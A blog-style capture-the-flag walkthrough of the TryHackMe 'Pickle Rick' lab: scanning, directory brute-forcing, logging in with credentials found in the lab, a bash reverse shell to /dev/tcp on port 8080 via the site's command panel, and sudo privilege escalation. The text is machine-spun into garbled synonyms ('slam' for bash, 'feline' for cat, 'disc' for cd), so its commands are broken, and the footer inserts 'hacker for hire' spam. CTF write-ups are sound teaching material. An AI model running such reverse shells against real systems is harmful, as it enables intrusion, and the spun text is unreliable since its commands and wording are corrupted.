Pickle Rick TryHackMe Walkthrough

 Today the time has come to tackle another test called Pickle Rick. It is accessible at TryHackMe for infiltration testing practice. The test is of simple trouble on the off chance that you have the right essential information and are mindful of little subtleties that are needed in the specification cycle. The credit for making this machine goes to tryhackme. The breakdown of the Machine with the redacted banners is: 

Level: Easy 

Entrance Testing Methodology 

Organization Scanning 

Nmap Scan 

List 

Listing HTTP Service 

Separating Username from Source Code 

Regisry Bruteforce utilizing dirb 

Separating Password from robots.txt 

Registry Bruteforce utilizing dirb [Extension] 

Signing into the Web Application

Taking advantage of Command Module 

Listing for Ingredients 

Summoning Reverse Shell 

Extricating the First Ingredient 

Identifying Ricks records 

Extricating the Second Ingredient 

Advntage Escalation 

Identifying Sudo Permissions 

Taking advantage of Sudo Permissions 

Getting Root Shell 

Extricating the Third Ingredient 

Walkthrough 

In the wake of Booting up the objective machine from the TryHackMe: Pickle Rick CTF Page, an IP will be appointed to the machine and will be apparent on that page too. 

IP Address: 10.10.43.98 

Three inquiries are needed to finish this machine. 

Organization Scanning 

We will begin a Nmap filter with the - sC for Default Scripts and - sV for Scanning Versions. 

nmap - sC - sV 10.10.43.98 

Nmap had the option to recognize 2 administrations running on the objective machine. It included SSH (22), HTTP (80). 

Identification 

Since we dont have certifications for the SSH administration, we will start the list from the HTTP administration. We see a straightforward Rick and Morty-themed site page. It peruses a message from Rick to Morty. It tells Morty that Rick has transformed himself into a Pickle once more. The curve is that he can't change back. He asks Morty to login into his PC and concentrate 3 mystery fixings that are needed for Rick to return to human from Pickle. Since Rick has failed to remember the secret key for his PC, Morty is needed to utilize his Hacking Skills to get those fixings. 

http://10.10.43.98/ 

We attempt to search for any pieces of information inside the actual page. We check the source code to find the username R1ckRul3s. 

view-source:http://10.10.43.98/ 

There are two prospects here, either this is a username that can be utilized to sign in through SSH or there is another login module inside the web application. To list the subsequent situation, we ran an index Bruteforce utilizing dirb as displayed in the picture beneath. We found the robots.txt record 

dirb http://10.10.43.98 

After perusing the robots.txt, we found Ricks adage Wubbalubbadubdub. This might be the secret key for the client that we viewed as before. Presently we really want to count that login page in case there is any. 

http://10.10.43.98/robots.txt 

Back to our catalog Bruteforce, this time we incorporated the augmentation channel with the Bruteforce. We checked for the php records. In the wake of running for some time, it had the option to extricate a login.php. Possibly this is the entry that can be utilized to login into the web application 

dirb http://10.10.43.98 - X .php 

After opening the login.php in the internet browser, we see that it is the entryway login. We utilize the username that we had the option to count from the source code of the landing page and the secret word that we had the option to identify from the robots.txt. 

http://10.10.43.98/login.php 

R1ckRul3s 

Wubbalubbadubdub 

Double-dealing 

We had the option to sign in utilizing the certifications. There were a lot of different pages and choices on the menu. Be that as it may, the Commands tab stood out for us. True to form, it was a board that can be utilized to run framework orders on the objective machine. We ran the ls order to track down a text document by the name of Sup3rS3cretPickl3Ingred.txt 

We had a go at perusing the Sup3rS3cretPickl3Ingred.txt record utilizing the feline order yet we were blocked by Mr. Meeseek he says that feline order is confined. 

This is the point at which we chose to open up an opposite shell by executing a converse shell script into the order segment. 

slam - c 'slam - I >&/dev/tcp/10.10.210.158/8080 0>&1' 

We began a Netcat audience prior to executing the opposite shell script order on the web application.

 When the execution went through, we had a converse shell on the objective machine as portrayed underneath.

 Presently there is no limiting that is preventing us from perusing the Sup3rS3cretPickl3Ingred.txt document. We see that it contains one of the three Ingredients. 

nc - lvp 8080 

ls 

feline Sup3rS3cretPickl3Ingred.txt 

The meeting that we have produced is for the client www-information.

 We specify the clients on the machine to observe the client rick.

 We crossed into the home index of the rick client to track down the Second fixing. 

disc/home 

ls 

disc rick 

ls 

feline 'second fixings' 

Advantage Escalation 

Presently, we want to lift the advantages on this machine to continue. We check for the sudo authorizations for the www-information client.

 We see that it can run all orders as root. We utilize the sudo order with slam to get the root shell. We had the option to get the root shell on the machine. 

We then, at that point, continued to peruse the Third Ingredient and close the machine.



Comments

Post a Comment

Popular posts from this blog

Windows Privilege Escalation: Insecure GUI Application

 Presentation  In the series of Privilege heightening, till now we have discovered that Microsoft Windows offers a wide scope of fine-grained consents and advantages for controlling admittance to Windows parts including administrations, documents, and vault sections. Today through applications we will take advantage of the advantages. Numerous GUI applications need higher advantages other than the current client to have, to get to a portion of their specific administrations. Furthermore, only because of misconfiguration of the application. Gives profound jump access to it.  hacker for hire Chapter by chapter guide Presentation  Requirements  Lab arrangement of unreliable GUI Application  Mishndling Insecure GUI Application  Essentials:  Machine A-Window 10 (Ignite as an administrator client)  Notepd+ Installed application on window 10  Lab Setup of Insecure GUI Application  Machine A, has touch off as an administrator client.  ...
Read more

Wireless Penetration Testing: Airgeddon

 Youll find how to utilize airgeddon for Wi-Fi hacking in this article. It empowers the catch of the WPA/WPA2 and PKMID handshakes to begin a beast power attack on the Wi-Fi secret phrase key. It likewise supports the production of an imaginary AP for dispatching Evil Twin Attack by attracting customers into the hostage gateway.  Chapter by chapter list  Introduce Airgeddon and Usage  Catching Handshake and Deauthentication  Aircrack Dictionary Attack for WPA Handshake  Airacrack Brute Force Attack for WPA Handshake  Hashcat Rule-Based Attack for WPA Handshake  Underhanded Twi Attack  find a hacker PMKID Attack  Let start by distinguishing the state for our remote connector by executing the ifconfig wlan0 order. Wlan0 states that our wireless association mode is empowered in our machine.  Introduce Airgeddon and Usage  Airgrddon Features:  Full help for 2.4Ghz and 5Ghz groups  Helped WPA/WPA2 individual organizations ...
Read more

Pickle Rick Try HacK Me Walkthrough

 Today the time has come to settle another test called Pickle Rick. It is accessible at TryHackMe for entrance testing practice. The test is of simple trouble on the off chance that you have the right fundamental information and are mindful of little subtleties that are needed in the specification interaction. The credit for making this machine goes to tryhackme. The breakdown of the Machine with the redacted banners is:  Hiring hacker Level: Easy  Infiltration Testing Methodology  Organization Scanning  Nmap Scan  Identification  Identifying HTTP Service  Extricating Username from Source Code  Index Bruteforce utilizing dirb  Extricating Password from robots.txt  Index Bruteforce utilizing dirb [Extension]  Signing nto the Web Application  Abuse  Taking advantage of Command Module  Specifying for Ingredients  Summoning Reverse Shell  Separating the First Ingredient  Specifying Ricks records  ...
Read more